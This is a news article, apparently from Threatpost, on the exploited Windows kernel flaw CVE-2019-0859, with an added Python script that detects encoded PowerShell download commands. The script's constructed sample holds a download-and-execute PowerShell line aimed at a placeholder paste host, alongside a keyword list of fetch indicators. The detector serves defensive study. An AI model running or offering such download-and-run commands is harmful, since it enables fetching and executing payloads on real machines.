A just-patched vulnerability in the Windows operating system that was unknown until last week is being actively exploited in the wild; it opens the door to full system takeover.
Discovered by Vasily Berdnikov and Boris Larin of Kaspersky Lab on St. Patrick’s Day this year, the flaw (CVE-2019-0859) is a use-after-free issue in the Windows kernel that allows local privilege escalation (LPE). It’s being used in advanced persistent threat (APT) campaigns, the researchers said, targeting 64-bit versions of Windows (from Windows 7 to older builds of Windows 10).
The attackers are using the bug to establish persistent backdoors to targeted machines, gaining the ability to run arbitrary code in kernel mode. An attacker could then install programs; view, change or delete data; or create new accounts with full user rights.
Fortunately, there’s a patch, which Microsoft pushed out in the most recent Patch Tuesday last week, so users should update their systems as soon as possible.
Improper Handling of Objects in Memory
In the win32k.sys kernel, the Function ID field is used to define the class of a window, such as “ScrollBar,” “Menu,” “Desktop” and others. The bug allows an attacker to manipulate the process of creating a window by sending specially crafted data sets to the Function ID field.
“During execution, CreateWindowEx sends the message WM_NCCREATE to the window when it’s first created,” the researchers said in an analysis on Monday. “By using the SetWindowsHookEx function, it is possible to set a custom callback that can handle the WM_NCCREATE message right before calling the window procedure.”
During that WM_NCCREATE callback, the Function ID is set to 0, which allows an adversary to set extra data for the window. “More importantly, we were able to change the address for the window procedure that was executed immediately after our hook,” researchers said. “The change of window procedure to the menu window procedure leads to the execution of xxxMenuWindowProc and the function initiates Function ID to FNID_MENU because the current message is equal to WM_NCCREATE. But the most important part is that the ability to manipulate extra data prior to setting Function ID to FNID_MENU can force the xxxMenuWindowProc function to stop initialization of the menu and return FALSE.”
Because of that, the sending of the NCCREATE message will be considered a failed operation, so the MENU-class window is not actually initialized, which allows an attacker to gain control over the address of a freed-up memory block.
Exploitation
An attacker (who would need to already be logged into the system) can run a specially crafted application to exploit the vulnerability.
In the observed attacks, a malicious executable makes use of the legitimate PowerShell framework with a Base64-encoded command, which then fetches a second-stage PowerShell script from a Pastebin site. That in turn executes a third and final stage, also a PowerShell script, which unpacks lightweight shellcode.
“The main goal of the shellcode is to make a trivial HTTP reverse shell,” the researchers explained. “This helps the attacker gain full control over the victim’s system.”
The use of PowerShell, which is built into Windows, along with simple encoding techniques, helps obfuscate malicious activity and keep anti-virus detections at bay.
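For defenders, the Base64-encoded first stage described above can be surfaced from process-creation logs by decoding the encoded-command argument and checking whether the result fetches remote content. The following is an added example, not code from Kaspersky Lab or Threatpost; the function names, hint list and sample command lines are constructed for illustration.

```python
import base64
import re

# powershell.exe accepts any prefix of -EncodedCommand (-e, -enc, ...) and the -ec alias.
PARAM = re.compile(r"[-/](\w+)\s+([A-Za-z0-9+/=]{16,})")
# Substrings suggesting the decoded command downloads and runs remote content.
FETCH_HINTS = ("downloadstring", "downloadfile", "invoke-webrequest",
               "net.webclient", "invoke-expression", "iex")
URL = re.compile(r"https?://[^\s'\")]+", re.I)

def decode_encoded_command(cmdline):
    """Return the decoded encoded-command payload, or None if absent or invalid."""
    if "powershell" not in cmdline.lower():
        return None
    for name, blob in PARAM.findall(cmdline):
        n = name.lower()
        if n == "ec" or "encodedcommand".startswith(n):
            try:
                # PowerShell expects Base64 over UTF-16LE text.
                return base64.b64decode(blob, validate=True).decode("utf-16-le")
            except (ValueError, UnicodeDecodeError):
                return None
    return None

def triage(cmdline):
    """Classify one process-creation command line."""
    decoded = decode_encoded_command(cmdline)
    if decoded is None:
        return {"encoded": False, "remote_fetch": False, "urls": []}
    urls = URL.findall(decoded)
    fetch = bool(urls) and any(h in decoded.lower() for h in FETCH_HINTS)
    return {"encoded": True, "remote_fetch": fetch, "urls": urls}

def ps_encode(script):
    """Helper that builds constructed test input the way PowerShell expects it."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")

# Constructed sample command lines (not taken from the observed campaign).
SAMPLES = [
    "powershell.exe -NoP -W Hidden -enc " + ps_encode(
        "IEX (New-Object Net.WebClient).DownloadString("
        "'https://paste.example.invalid/raw/SAMPLE')"),
    "powershell.exe -ExecutionPolicy Bypass -File C:\\Scripts\\inventory.ps1",
    "powershell.exe -EncodedCommand " + ps_encode("Get-Date"),
]

if __name__ == "__main__":
    for line in SAMPLES:
        print(triage(line))
```

Only the first sample is flagged as a remote fetch; the third shows that an encoded command alone is not treated as malicious, which keeps noise down where administrators legitimately use encoded commands.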
Threatpost has reached out to Kaspersky Lab for additional details on the victimology of the campaigns.
“At this time we don’t have any information regarding the target,” the firm told Threatpost. “We have not seen activity of this group before and our researchers are currently investigating this attack to restore the full kill chain. As soon as we find the initial vector of attack we will share this information.”
This is the fifth consecutive exploited LPE zero-day vulnerability discovered in Windows recently. The others are CVE-2018-8453, CVE-2018-8589, CVE-2018-8611 (a zero-day in the Windows Kernel Transaction Manager) and the CVE-2019-0797 “fourth horseman” vulnerability. The latter was seen being exploited in the wild by at least two threat actors, including a recently discovered APT group dubbed SandCat, and the FruityArmor group.